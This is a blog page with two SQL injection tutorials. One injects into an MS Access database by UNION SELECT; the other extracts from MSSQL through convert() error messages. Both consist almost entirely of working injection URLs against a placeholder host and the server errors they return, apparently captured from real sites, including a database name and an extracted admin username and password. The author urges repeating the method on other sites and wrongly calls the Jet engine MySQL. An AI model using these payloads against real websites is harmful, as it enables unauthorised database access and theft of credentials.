My Blog List

09 October, 2022

MS-Access Injection - Tutorial - Penetration Testing | Bug Bounty Program

 In this Tutorial You Will learn How to inject into MS Access Database.

So we will start Our Injecting Manually. First we have to check if Our Target site is Vulnerable. So we

will use Regular Injecting Type and add Single Quote ' at the end of the Parameter.

and Execute the URL

http://www.Vuln-Site.com/dettaglio-news.asp?ID=341'

Here we got The ERROR ! !



ERROR:

Microsoft JET Database Engine error '80040e14'

Syntax error in string in query expression 'ID =341''.

/dettaglio-news.asp, line 91


So Our Target is Vulnerable. Before Starting Other Process first we have To balance

our query. We will use Different Comments for balancing Our Query.


http://www.Vuln-Site.com/dettaglio-news.asp?ID=341--+ Error !

ERROR:Syntax error (missing operator) in query expression 'ID =341--'.

http://www.Vuln-Site.com/dettaglio-news.asp?ID=341-- Again Error !!

Now Let's Check the null-byte " ;% 00 "


http://www.Vuln-Site.com/dettaglio-news.asp?ID=341;% 00 Error Gone!!

so will continue our Injecting with using Null-Byte at the end of the Parameter.

Now we have to Count the Total number of Columns. So For This Purpose we will

use Normally ORDER BY command.

Let's Check Total Number of Columns:

http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 order by 1;% 00


No Error. Page Loaded Normally !

http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 order by 5;% 00

Again No Error !

http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 order by 8;% 00

Again page Loaded Normally !

but at order by 9 we have got the ERROR !

http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 order by 9;% 00



ERROR:

Microsoft JET Database Engine error '80040e14'

The Microsoft Jet database engine does not recognize '9' as a valid field name or

expression.

/dettaglio-news.asp, line 91

So There are 8 Columns .

Now Let's Prepare our UNION BASED command.

After Executing The UNION BASED query We have Got ERROR:


http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 Union Select 1,2,3,4,5,6,7,8;%

00



 

ERROR:

Microsoft JET Database Engine error '80004005'

Query input must contain at least one table or query.

/dettaglio-news.asp, line 91

Here Comes The Main part.As our columns count is correct.so it seems to be

Database is mysql 4.

Now we Have to Guess the Tables and Columns.So First we will Guess the Tables.

http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 Union Select 1,2,3,4,5,6,7,8

from Login;% 00

it gives us ERROR!



ERROR:

Microsoft JET Database Engine error '80040e37'

The Microsoft Jet database engine cannot find the input table or query 'login'. Make

sure it exists and that its name is spelled correctly.

/dettaglio-news.asp, line 91

it Mean this table is not Exist. Let’s Try another.

http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 Union Select 1,2,3,4,5,6,7,8

from tabladmin;% 00

Still The Same ERROR!!

But when we try Table ADMIN the Error is Gone.

http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 Union Select 1,2,3,4,5,6,7,8

from admin;% 00

At the Table ADMIN the Error is gone and we can see the Vulnerable Columns on

the Web Page .



You can see the 2,3,6 are the Vulnerable Columns.so now we have to Guess the

Columns. We will put our columns in these Vulnerable Columns.


http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 Union Select

1,2,admin_id,4,5,6,7,8 from admin;% 00

It Gives us Error !



ERROR:

Microsoft JET Database Engine error '80040e10'

No value given for one or more required parameters.

/dettaglio-news.asp, line 91

it Mean ,this Column is not existing. Let's Try Another.


http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 Union Select

1,2,login_id,4,5,6,7,8 from admin;% 00

Still The Same Error !

When we Put Username Column the Error is Gone.


http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 Union Select

1,2,username,4,5,6,7,8 from admin;% 00



So it gives us Username:01775IO5

Now Let's Guess column of Admin Password.

And the Column Password is also existing there.

http://www.Vuln-Site.com/dettaglio-news.asp?ID=341 Union Select

1,2,password,4,5,6,7,8 from admin;% 00



it Gives us Password="bEx0Th6

So we will do the same for other sites to injecting into database.

Oleh On No comments:
in , , , , , ,

MSSQL Injection Using Convert - Penetration Testing - Bug Bounty Program

 In our Previous Tutorial We Have Discuss About Union Based Injection

Now Let's Come to the Next Part. In this Tutorial You Will Learn About Injecting Site

with Convert Attack. How Actually This Command Work. This command works

between two Data types and we have to give Commands to the Server with Convert

then it will give That Specific Data which we have execute in the Command.


So let's start our injection Manually.

we got A target and let's Check if it's Vulnerable for injecting. So we will Execute the

URL by Adding Single Quote " ' "at the End If the Target Parameter.


http://www.Vuln-Site.com/authorprofile.asp?id=46'

It Gives us Error




ERROR:

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark after the

character string ''.

/authorprofile.asp, line 10


Our Target site is Vulnerable. As we Are Injecting with Convert Attack So we no need

to Go For Counting the Total number Of Columns. We will Directly Execute our

Commands with Convert.

Let's Check The Version.

http://www.Vuln-Site.com/authorprofile.asp?id=46 and 1=convert(int,@@version)--

After Executing the Query We Got The Version.



Here is Version:Microsoft SQL Server 2012 - 11.0.5582.0 (X64) Feb 27 2015 18:10:15

Copyright (c) Microsoft Corporation Web Edition (64-bit) on Windows NT 6.1 <X64>

(Build 7601: Service Pack 1)

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Conversion failed when converting

the nvarchar value 'Microsoft SQL Server 2012 - 11.0.5582.0 (X64) Feb 27 2015

18:10:15 Copyright (c) Microsoft Corporation Web Edition (64-bit) on Windows NT

6.1 <X64> (Build 7601: Service Pack 1) ' to data type int.

/authorprofile.asp, line 10

Now Let's check The Current Database name.

http://www.Vuln-Site.com/authorprofile.asp?id=46 and 1=convert(int,db_name())—


And we Have got The Current Database Name.


This is Current Database Name:museindia
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Conversion failed when converting
the nvarchar value 'museindia' to data type int.
/authorprofile.asp, line 10
As we have get the Version and The Database name. Now Let's move to Getting The
Tables.

This is Our Query for getting the Tables.
http://www.Vuln-Site.com/authorprofile.asp?id=46 and 1=convert(int,(select top 1
table_name from information_schema.tables))--+

After Executing the Query we have Got The First Table Name.


Table name:about
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Conversion failed when converting
the nvarchar value 'about' to data type int.
/authorprofile.asp, line 10
For Getting the Other Tables from the Database we will add our Previous Table name
Enclosed By Single Quotes with in Small Brackets.

For Example:
and 1=convert(int,(select top 1 table_name from information_schema.tables where
table_name not in
('OUR_PREVIOUS_TABLE_NAME_1','OUR_PREVIOUS_TABLE_NAME_2')))--+

So Let's Check The Other Tables from the Database.

http://www.Vuln-Site.com/authorprofile.asp?id=46 and 1=convert(int,(select top 1
table_name from information_schema.tables where table_name not in ('about')))--+

And We Have got The Next Table Name


Next Table Name:aucon

Microsoft OLE DB Provider for ODBC Drivers error '80040e07'

[Microsoft][ODBC SQL Server Driver][SQL Server]Conversion failed when converting

the nvarchar value 'aucon' to data type int.

/authorprofile.asp, line 10

In this Way we will Continue to Getting Other tables until get Required Table.

Here we Got The Table name: members


Now let's Get the Column names from this Table.


http://www.Vuln-Site.com/authorprofile.asp?id=46 and 1=convert(int,(select top 1

column_name from information_schema.columns where table_name='members'))--+

we have got the First Column name.


This is the First Column Name: memberid

Let's try to get the other Columns as we do the same for getting the other

tables from the database.

http://www.Vuln-Site.com/authorprofile.asp?id=46 and 1=convert(int,(select top 1

column_name from information_schema.columns where table_name='members' and

column_name not in ('memberid')))--+


So After Getting the Column name The Final Part is To Extracting Data from The

Columns.

This will be Our Final Query !

http://www.Vuln-Site.com/authorprofile.asp?id=46 and 1=convert(int,(select top

1OUR_COLUMN_NAME _HERE from OUR_TABLE_NAME_HERE))--+


This query will Print the Data from the Columns on the Webpage.

Oleh On No comments:
in , , , , , ,
Subscribe to: Comments (Atom)

Popular Posts